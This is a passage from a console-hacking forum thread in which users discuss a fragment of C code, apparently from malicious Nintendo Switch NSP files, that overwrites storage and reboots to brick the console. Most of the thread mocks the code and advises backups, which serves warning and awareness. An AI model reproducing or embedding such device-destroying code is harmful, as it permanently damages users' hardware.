buf[i+3] = '8';
        buf[i+4] = '5'; }
fsStorageWrite(&store, 0, buf, 0x5000);
    fsStorageClose(&store);
    free(buf);
    bpcRebootSystem();
}

It's utterly horrendously written code.

There's just something funny about freeing used memory after bricking it. The console is obviously not going to benefit from the freed memory (it's bricked for a start) but it still amuses me that they've actually thought about the code while writing it.

rob4

Newcomer
Trophies
XP
Country
Argentina
To anybody that uses nsp and don't know if they have malware, try scan them with some helpful tools (idk which ones))

Flying Scotsman

Trophies
XP
Country
United States
To anybody that uses nsp and don't know if they have malware, try scan them with some helpful tools (idk which ones))

It won't bring anything up. That brick code isn't seen as malware.

You'll have to do the smart thing and actually backup your Switch and listen to other users before installing random junk off the internet instead.

mattytrog

You don`t want to listen to anything I say.
Trophies
XP
Country
United Kingdom
There's just something funny about freeing used memory after bricking it. The console is obviously not going to benefit from the freed memory (it's bricked for a start) but it still amuses me that they've actually thought about the code while writing it.
A bit like why do they use sterile wipes to clean the skin just before a lethal injection?

Reactions: normal19

Crusatyr

Trophies
XP
Country
United States

I'm sure good programming habits are hard to break... eh, who am I kidding, no one has those.

AliciaBurrito

Newcomer
Trophies
XP
Country
United States
Nice writeup Midstor, now I know precisely the way it doesn't work. So at least that's one less possibility I can check off the list :)

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
    K3Nv2 @ K3Nv2: https://www.marijuanamoment.net/marijuana-rolling-paper-company-will-pay-4-20-to-volunteers-to-sm...